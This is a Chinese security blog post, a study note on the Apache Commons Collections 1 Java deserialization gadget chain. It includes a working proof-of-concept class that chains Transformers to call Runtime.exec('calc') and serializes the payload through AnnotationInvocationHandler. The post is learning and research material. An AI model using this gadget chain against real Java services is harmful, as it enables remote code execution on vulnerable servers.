

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.svg">
  <link rel="icon" href="/img/favicon.svg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#17354a">
  <meta name="author" content="Pupi1">
  <meta name="keywords" content="Security Research,Java Security,AI Security,CTF">
  
    <meta name="description" content="CommonsCollections1Apache Commons Collections 是一个扩展了 Java 标准库里的 Collection 结构的第三方基础库，它提供了很多强有力的数据结构类型并实现了各种集合工具类。作为 Apache 开源项目的重要组件，被广泛运用于各种 Java 应用的开发。">
<meta property="og:type" content="article">
<meta property="og:title" content="cc链学习记录">
<meta property="og:url" content="https://pupil857.github.io/2021/12/07/cc-learn/">
<meta property="og:site_name" content="Pupi1&#39;s Blog">
<meta property="og:description" content="CommonsCollections1Apache Commons Collections 是一个扩展了 Java 标准库里的 Collection 结构的第三方基础库，它提供了很多强有力的数据结构类型并实现了各种集合工具类。作为 Apache 开源项目的重要组件，被广泛运用于各种 Java 应用的开发。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pupil857.github.io/2021/12/07/cc-learn/image-20211207165300195.png">
<meta property="og:image" content="https://pupil857.github.io/2021/12/07/cc-learn/image-20211207171728677.png">
<meta property="og:image" content="https://pupil857.github.io/2021/12/07/cc-learn/image-20211207171838361.png">
<meta property="og:image" content="https://pupil857.github.io/2021/12/07/cc-learn/image-20211207202524233.png">
<meta property="article:published_time" content="2021-12-07T08:40:26.000Z">
<meta property="article:modified_time" content="2026-03-24T16:53:33.799Z">
<meta property="article:author" content="Pupi1">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="X1cT34m">
<meta property="article:tag" content="NJUPT">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pupil857.github.io/2021/12/07/cc-learn/image-20211207165300195.png">
  
  
  
  <title>cc链学习记录 | Pupi1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"pupil857.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 55vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Pupi1</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>链接</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/links/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-link-fill"></i>
                  <span>链接</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/site-hero-post.svg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.15)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="cc链学习记录"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-12-07 16:40" pubdate>
          2021-12-07 16:40
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">cc链学习记录</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="CommonsCollections1"><strong>CommonsCollections1</strong></h3><p><a href="https://commons.apache.org/proper/commons-collections/index.html" rel="noopener" target="_blank">Apache Commons Collections</a> 是一个扩展了 Java 标准库里的 Collection 结构的第三方基础库，它提供了很多强有力的数据结构类型并实现了各种集合工具类。作为 Apache 开源项目的重要组件，被广泛运用于各种 Java 应用的开发。</p>

<span id="more"></span>

<p>调用链：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br/><span class="line">   *Map(Proxy).entrySet()</span><br/><span class="line">        *AnnotationInvocationHandler.invoke()</span><br/><span class="line">            LazyMap.get()/TransformedMap.setValue()</span><br/><span class="line">                ChainedTransformer.transform()</span><br/><span class="line">                    ConstantTransformer.transform()</span><br/><span class="line">                        InvokerTransformer.transform()</span><br/></pre></td></tr></table></figure>
</blockquote>
<p>依赖：</p>
<blockquote>
<p>CommonsCollections ： 3.1-3.2.1</p>
<p>TransformedMap - jdk &lt; 8u71</p>
</blockquote>
<h3 id="前置知识">前置知识</h3><p>先来了解一些cc库的一些方法</p>
<p>首先 CC 库中提供了一个抽象类 <code>org.apache.commons.collections.map.AbstractMapDecorator</code>，这个类是 Map 的扩展，并且从名字中可以知道，这是一个基础的装饰器，用来给 map 提供附加功能，被装饰的 map 存在该类的属性中，并且将所有的操作都转发给这个 map。</p>
<p>主要是<code>TransformedMap</code>和<code>LazyMap</code></p>
<h4 id="TransformedMap">TransformedMap</h4><p><code>org.apache.commons.collections.map.TransformedMap</code>这个类主要是在一个元素加入集合内时，自动进行修饰变换，会自己去调用<code>Transformer</code>去实现，Transformer 在 TransformedMap 实例化时作为参数传入。</p>
<p><img alt="image-20211207165300195" src="/2021/12/07/cc-learn/image-20211207165300195.png" srcset="/img/loading.gif" lazyload/></p>
<p>这里TransformedMap内的key或value发生变化就会触发对应参数的Transform（）方法</p>
<h4 id="LazyMap">LazyMap</h4><p><code>org.apache.commons.collections.map.LazyMap</code> 与 TransformedMap 类似，不过差异是调用 <code>get()</code> 方法时如果传入的 key 不存在，则会触发相应参数的 Transformer 的 <code>transform()</code> 方法。</p>
<p>与 LazyMap 具有相同功能的，是 <code>org.apache.commons.collections.map.DefaultedMap</code>，同样是 <code>get()</code> 方法会触发 transform 方法。</p>
<h3 id="Transformer">Transformer</h3><p><code>org.apache.commons.collections.Transformer</code> 是一个接口，提供了一个 <code>transform()</code> 方法，用来定义具体的转换逻辑。方法接收 Object 类型的 input，处理后将 Object 返回。</p>
<p>在 Commons Collection 3.2.1 中，程序提供了 14 个 Transformer 的实现类，用来实现不同的对 TransformedMap 中 key/value 进行修改的功能。</p>
<p>这里主要看几个类的transform的实现</p>
<p><code>InvokerTransformer</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">transform</span><span class="params">(Object input)</span> </span>{</span><br/><span class="line">       <span class="keyword">if</span> (input == <span class="keyword">null</span>) {</span><br/><span class="line">           <span class="keyword">return</span> <span class="keyword">null</span>;</span><br/><span class="line">       } <span class="keyword">else</span> {</span><br/><span class="line">           <span class="keyword">try</span> {</span><br/><span class="line">               Class cls = input.getClass();</span><br/><span class="line">               Method method = cls.getMethod(<span class="keyword">this</span>.iMethodName, <span class="keyword">this</span>.iParamTypes);</span><br/><span class="line">               <span class="keyword">return</span> method.invoke(input, <span class="keyword">this</span>.iArgs);</span><br/><span class="line">           } <span class="keyword">catch</span> (NoSuchMethodException var5) {</span><br/><span class="line">               <span class="keyword">throw</span> <span class="keyword">new</span> FunctorException(<span class="string">"InvokerTransformer: The method '"</span> + <span class="keyword">this</span>.iMethodName + <span class="string">"' on '"</span> + input.getClass() + <span class="string">"' does not exist"</span>);</span><br/><span class="line">           } <span class="keyword">catch</span> (IllegalAccessException var6) {</span><br/><span class="line">               <span class="keyword">throw</span> <span class="keyword">new</span> FunctorException(<span class="string">"InvokerTransformer: The method '"</span> + <span class="keyword">this</span>.iMethodName + <span class="string">"' on '"</span> + input.getClass() + <span class="string">"' cannot be accessed"</span>);</span><br/><span class="line">           } <span class="keyword">catch</span> (InvocationTargetException var7) {</span><br/><span class="line">               <span class="keyword">throw</span> <span class="keyword">new</span> FunctorException(<span class="string">"InvokerTransformer: The method '"</span> + <span class="keyword">this</span>.iMethodName + <span class="string">"' on '"</span> + input.getClass() + <span class="string">"' threw an exception"</span>, var7);</span><br/><span class="line">           }</span><br/><span class="line">       }</span><br/><span class="line">   }</span><br/></pre></td></tr></table></figure>
<p>这里很明显就是通过反射去创建一个对象，那么就可以通过反射去执行命令。</p>
<p><img alt="image-20211207171728677" src="/2021/12/07/cc-learn/image-20211207171728677.png" srcset="/img/loading.gif" lazyload/></p>
<h4 id="ChainedTransformer">ChainedTransformer</h4><p><code>org.apache.commons.collections.functors.ChainedTransformer</code> 类也是一个 Transformer的实现类，但是这个类自己维护了一个 Transformer 数组， 在调用  ChainedTransformer 的 transform 方法时，会循环数组，依次调用 Transformer 数组中每个  Transformer 的 transform 方法，并将结果传递给下一个 Transformer。</p>
<p><img alt="image-20211207171838361" src="/2021/12/07/cc-learn/image-20211207171838361.png" srcset="/img/loading.gif" lazyload/></p>
<p>那这里首尾相连的感觉就很像链子了，给了我们一个链式调用多个transformer分别处理对象的能力。</p>
<h4 id="ConstantTransformer">ConstantTransformer</h4><p><code>org.apache.commons.collections.functors.ConstantTransformer</code> 是一个返回固定常量的 Transformer，在初始化时储存了一个 Object，后续的调用时会直接返回这个 Object。</p>
<p>这个类用于和 ChainedTransformer 配合，将其结果传入 InvokerTransformer 来调用我们指定的类的指定方法。</p>
<h3 id="poc构造">poc构造</h3><p>我们的目的还是去执行 <code>Runtime.getRuntime().exec("calc")</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/></pre></td><td class="code"><pre><span class="line">ChainedTransformer chain = <span class="keyword">new</span> ChainedTransformer(<span class="keyword">new</span> Transformer[]{</span><br/><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]{String.class, Class[].class}, <span class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]{Object.class, Object[].class}, <span class="keyword">new</span> Object[]{<span class="keyword">null</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]{String.class}, <span class="keyword">new</span> Object[]{<span class="string">"calc"</span>})</span><br/><span class="line">        });</span><br/></pre></td></tr></table></figure>
<p>这里一步一步来分析，先要获取<code>Runtime</code>的类通过<code>ConstantTransformer</code>去存这个Object并在调用中返回给下一个<code>InvokerTransformer</code>，第1个<code>InvokerTransformer</code>去获取了这个类的并用反射去调用getMethod方法获取到了Runtime.getRuntime这个方法，第2个<code>InvokerTransformer</code>通过反射去用invoke触发获得Runtime.getRuntime()的方法，那么到这就通过反射拿到了Runtime的类，相当于完成了<code>Runtime.getRuntime()</code>。然后最后一个就是直接反射去调用exec方法造成rce。</p>
<p>到这里就完成了反序列化链中最后触发恶意命令的部分，但是现在还是通过<code>map.put </code>去触发，所以要继续往上找，一个类重写了readObject，在反序列化时改变了map的值。</p>
<p>于是我们找到了 <code>sun.reflect.annotation.AnnotationInvocationHandler</code> 这个类。这个类实现了 InvocationHandler 接口，原本是用于 JDK 对于注解形式的动态代理。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler(Class&lt;? extends Annotation&gt; var1, Map&lt;String, Object&gt; var2) {</span><br/><span class="line">        Class[] var3 = var1.getInterfaces();</span><br/><span class="line">        <span class="keyword">if</span> (var1.isAnnotation() &amp;&amp; var3.length == <span class="number">1</span> &amp;&amp; var3[<span class="number">0</span>] == Annotation.class) {</span><br/><span class="line">            <span class="keyword">this</span>.type = var1;</span><br/><span class="line">            <span class="keyword">this</span>.memberValues = var2;</span><br/><span class="line">        } <span class="keyword">else</span> {</span><br/><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> AnnotationFormatError(<span class="string">"Attempt to create proxy for a non-annotation type."</span>);</span><br/><span class="line">        }</span><br/><span class="line">    }</span><br/></pre></td></tr></table></figure>
<p>构造方法接收两个参数，第一个参数是 Annotation 实现类的 Class 对象，第二个参数是是一个 key 为 String、value 为 Object 的 Map。构造方法判断 var1 有且只有一个父接口，并且是 <code>Annotation.class</code>，才会将两个参数初始化在成员属性 type 和 memberValues 中。</p>
<p>然后看他的readObject</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/><span class="line">25</span><br/><span class="line">26</span><br/><span class="line">27</span><br/><span class="line">28</span><br/><span class="line">29</span><br/></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream var1)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>{</span><br/><span class="line">        <span class="comment">//默认反序列化</span></span><br/><span class="line">        var1.defaultReadObject();</span><br/><span class="line">        AnnotationType var2 = <span class="keyword">null</span>;</span><br/><span class="line"></span><br/><span class="line">        <span class="keyword">try</span> {</span><br/><span class="line">            var2 = AnnotationType.getInstance(<span class="keyword">this</span>.type);</span><br/><span class="line">        } <span class="keyword">catch</span> (IllegalArgumentException var9) {</span><br/><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> InvalidObjectException(<span class="string">"Non-annotation type in annotation serial stream"</span>);</span><br/><span class="line">        }</span><br/><span class="line"></span><br/><span class="line">        Map var3 = var2.memberTypes();<span class="comment">//</span></span><br/><span class="line">        Iterator var4 = <span class="keyword">this</span>.memberValues.entrySet().iterator();<span class="comment">//获取我们构造map的迭代器</span></span><br/><span class="line"></span><br/><span class="line">        <span class="keyword">while</span>(var4.hasNext()) {</span><br/><span class="line">            Entry var5 = (Entry)var4.next();<span class="comment">//遍历map迭代器</span></span><br/><span class="line">            String var6 = (String)var5.getKey();<span class="comment">//获取key的名称</span></span><br/><span class="line">            Class var7 = (Class)var3.get(var6);<span class="comment">//获取var2中相应key的class类？这边具体var3是什么个含义不太懂，但是肯定var7、8两者不一样</span></span><br/><span class="line">            <span class="keyword">if</span> (var7 != <span class="keyword">null</span>) {</span><br/><span class="line">                Object var8 = var5.getValue();<span class="comment">//获取map的value</span></span><br/><span class="line">                <span class="keyword">if</span> (!var7.isInstance(var8) &amp;&amp; !(var8 <span class="keyword">instanceof</span> ExceptionProxy)) {</span><br/><span class="line">                    <span class="comment">//两者类型不一致，给var5赋值！！具体赋值什么已经不关键了！只要赋值了就代表执行命令成功</span></span><br/><span class="line">                    var5.setValue((<span class="keyword">new</span> AnnotationTypeMismatchExceptionProxy(var8.getClass() + <span class="string">"["</span> + var8 + <span class="string">"]"</span>)).setMember((Method)var2.members().get(var6)));</span><br/><span class="line">                }</span><br/><span class="line">            }</span><br/><span class="line">        }</span><br/><span class="line"></span><br/><span class="line">    }</span><br/><span class="line">}</span><br/></pre></td></tr></table></figure>
<p>首先调用 <code>AnnotationType.getInstance(this.type)</code> 方法来获取 type 这个注解类对应的 AnnotationType 的对象，然后获取其 memberTypes 属性，这个属性是个 Map，存放这个注解中可以配置的值。</p>
<p>然后循环 <code>this.memberValues</code> 这个 Map ，获取其 Key，如果注解类的 memberTypes 属性中存在与 <code>this.memberValues</code> 的 key 相同的属性，并且取得的值不是 ExceptionProxy 的实例也不是 memberValues 中值的实例，则取得其值，并调用 setValue 方法写入值。</p>
<p>那现在思路就很明显了：</p>
<ul>
<li>构造一个 AnnotationInvocationHandler 实例，初始化时传入一个注解类和一个 Map，这个 Map 的 key 中要有注解类中存在的属性，但是值不是对应的实例，也不是 ExceptionProxy 对象。</li>
<li>这个 Map 由 TransformedMap 封装，并调用自定义的 ChainedTransformer 进行装饰。</li>
<li>ChainedTransformer 中写入多个 Transformer 实现类，用于链式调用，完成恶意操作。</li>
</ul>
<p>根据思路写poc</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/><span class="line">25</span><br/><span class="line">26</span><br/><span class="line">27</span><br/><span class="line">28</span><br/><span class="line">29</span><br/><span class="line">30</span><br/><span class="line">31</span><br/><span class="line">32</span><br/><span class="line">33</span><br/><span class="line">34</span><br/><span class="line">35</span><br/><span class="line">36</span><br/><span class="line">37</span><br/><span class="line">38</span><br/><span class="line">39</span><br/><span class="line">40</span><br/><span class="line">41</span><br/><span class="line">42</span><br/><span class="line">43</span><br/><span class="line">44</span><br/><span class="line">45</span><br/><span class="line">46</span><br/><span class="line">47</span><br/><span class="line">48</span><br/><span class="line">49</span><br/><span class="line">50</span><br/><span class="line">51</span><br/><span class="line">52</span><br/></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.demo.aaaa;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br/><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br/><span class="line"><span class="keyword">import</span> java.util.Map;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Test</span> </span>{</span><br/><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> HashMap&lt;Integer, String&gt; hashMap = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br/><span class="line"><span class="comment">//        hashMap.put(1, "a");</span></span><br/><span class="line"><span class="comment">//        System.out.println("初始化map:" + hashMap);</span></span><br/><span class="line">        <span class="comment">//Map map = TransformedMap.decorate(hashMap, keyTransformer, valueTransformer);</span></span><br/><span class="line">        <span class="comment">//map.put(2, "b");</span></span><br/><span class="line"><span class="comment">//        Transformer transformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});</span></span><br/><span class="line"><span class="comment">//        transformer.transform(Runtime.getRuntime());</span></span><br/><span class="line"><span class="comment">//        Map map = TransformedMap.decorate(hashMap, transformer, valueTransformer);</span></span><br/><span class="line"><span class="comment">//        map.put(Runtime.getRuntime(),"b");</span></span><br/><span class="line">        ChainedTransformer chain = <span class="keyword">new</span> ChainedTransformer(<span class="keyword">new</span> Transformer[]{</span><br/><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]{String.class, Class[].class}, <span class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]{Object.class, Object[].class}, <span class="keyword">new</span> Object[]{<span class="keyword">null</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]{String.class}, <span class="keyword">new</span> Object[]{<span class="string">"calc"</span>})</span><br/><span class="line">        });</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line">        Map inmap = <span class="keyword">new</span> HashMap();</span><br/><span class="line">        <span class="comment">// 这里 key 一定是 下面实例化 AnnotationInvocationHandler 时传入的注解类中存在的属性值</span></span><br/><span class="line">        <span class="comment">// 并且这里的值的一定不是属性值的类型</span></span><br/><span class="line">        inmap.put(<span class="string">"value"</span>,<span class="string">"asd"</span>);<span class="comment">//这里value是下面传进的Target中有的属性所以可以触发</span></span><br/><span class="line">        Map outmap = TransformedMap.decorate(inmap,<span class="keyword">null</span>,chain);</span><br/><span class="line">        Class anno = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);<span class="comment">//反射调用</span></span><br/><span class="line">        Constructor ctor = anno.getDeclaredConstructor(Class.class,Map.class);</span><br/><span class="line">        ctor.setAccessible(<span class="keyword">true</span>);</span><br/><span class="line">        Object instance = ctor.newInstance(Target.class,outmap);<span class="comment">//调用构造器生成我们的恶意类</span></span><br/><span class="line">        String a = Tools.base64Encode(Tools.serialize(instance));</span><br/><span class="line">        System.out.println(a);</span><br/><span class="line">        Tools.deserialize(Tools.base64Decode(a));</span><br/><span class="line"></span><br/><span class="line">    }</span><br/><span class="line">}</span><br/><span class="line"></span><br/></pre></td></tr></table></figure>
<p>这样就可以触发弹出计算器。</p>
<p>还有主要的几个问题，就是这条链子只能在低版本运行jdk8u65之前吧应该是，主要是因为之后的jdk中把<code>sun.reflect.annotation.AnnotationInvocationHandler</code></p>
<p>readObject的方法改了不再有对map的赋值语句，所以触发不了。</p>
<h4 id="LazyMap链">LazyMap链</h4><p>那么这里来介绍另一个，通过lazymap去做到同样的事情。</p>
<p>lazymap是要去找到一个可以触发他get方法的地方。</p>
<p>我们看到在</p>
<p><code>sun.reflect.annotation.AnnotationInvocationHandler</code>中的invoke方法中存在触发get方法的语句</p>
<p><img alt="image-20211207202524233" src="/2021/12/07/cc-learn/image-20211207202524233.png" srcset="/img/loading.gif" lazyload/></p>
<p>那么我们改一下触发点就好了</p>
<p>这里用到了动态代理的知识，总结起来的一句话就是被动态代理的对象调用任意方法都会调用对应的InvocationHandler 的 <code>invoke</code> 方法。</p>
<p>那构造的思路的就有了，在使用带有装饰器的 LazyMap 初始化 AnnotationInvocationHandler 之前，先使用  InvocationHandler 代理一下 LazyMap，这样反序列化 AnnotationInvocationHandler 时，调用  LazyMap 值的 setValue 方法之前会调用代理类的 invoke 方法，触发 LazyMap 的 get 方法。</p>
